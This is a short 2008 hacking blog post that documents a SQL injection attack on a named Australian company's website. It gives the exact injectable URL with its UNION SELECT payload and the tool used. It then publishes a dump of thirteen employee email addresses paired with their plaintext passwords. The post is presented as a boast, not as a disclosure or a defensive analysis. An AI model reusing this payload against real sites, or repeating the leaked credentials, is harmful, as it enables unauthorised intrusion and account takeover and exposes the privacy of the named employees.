viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Saturday, November 22, 2008

[SQLi] http://www.broadsword.com.au

8:32 PM Posted by viperfx07 No comments
Tools: schemafuzz.py
Database info: [+] URL: http://www.broadsword.com.au/news.php?id=35+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 20:20:43
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: broadsword
User: broadsword@localhost
Version: 4.1.22
[+] Dumping data from database "broadsword" Table "users"
[+] and Column(s) ['email', 'password']
[+] Number of Rows: 13

[0] sharon@broadsword.com.au:cameron:
[1] suzanne@broadsword.com.au:elise:
[2] drewp@broadsword.com.au:dr3w2006:
[3] ianf@broadsword.com.au:flett07:
[4] brain@broadsword.com.au:gus2208:
[5] gerald@broadsword.com.au:hockey1:
[6] castle@broadsword.com.au:col69:
[7] piers@broadsword.com.au:poohey:
[8] stuartk@broadsword.com.au:miranda1:
[9] dominicr@broadsword.com.au:zaq12wsx:
[10] pas.dimuccio@broadsword.com.au:sales2008:
[11] daniel.dixon@broadsword.com.au:sales2008:
[12] davidg@broadsword.com.au:sales:

[-] 20:20:46
[-] Total URL Requests 15
[-] Done

0 comments:

Post a Comment